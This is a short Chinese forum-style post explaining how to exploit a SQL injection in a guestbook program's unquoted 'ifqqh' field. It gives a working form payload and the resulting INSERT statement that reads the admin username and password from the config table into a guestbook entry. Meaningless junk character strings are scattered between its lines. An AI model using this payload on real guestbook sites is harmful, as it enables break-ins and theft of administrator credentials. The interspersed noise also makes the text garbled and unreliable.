留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。4 `9 K$ A& @( C
+ ~4 C5 W8 _$ D. A$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
! ~0 A+ A: V' ~5 Z8 R$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响3 k# ?+ e0 T1 _7 w/ s5 n
- R n3 V( J g提交的时候把ifqqh的值改一下。变成- c" q8 Z2 q( e$ }, g3 o
6 u/ e8 _% C- t4 Z4 Y
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />, A3 Z2 _ d6 v1 z
% a. G& V, A1 w! L4 y9 W b
这样SQL插入语句就变了.
4 A; l9 Y% j9 h6 |, g9 e
6 O* a5 I- q8 [5 b: b( einsert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
: O1 g3 \9 R4 W! e- K# D
" m* f8 Y+ G7 h$ Y& ~构造了另外一句SQL。并且把帐号密码读出来。
# p9 S3 s6 H$ ^
) O' n, _9 e) s6 w7 o6 @ |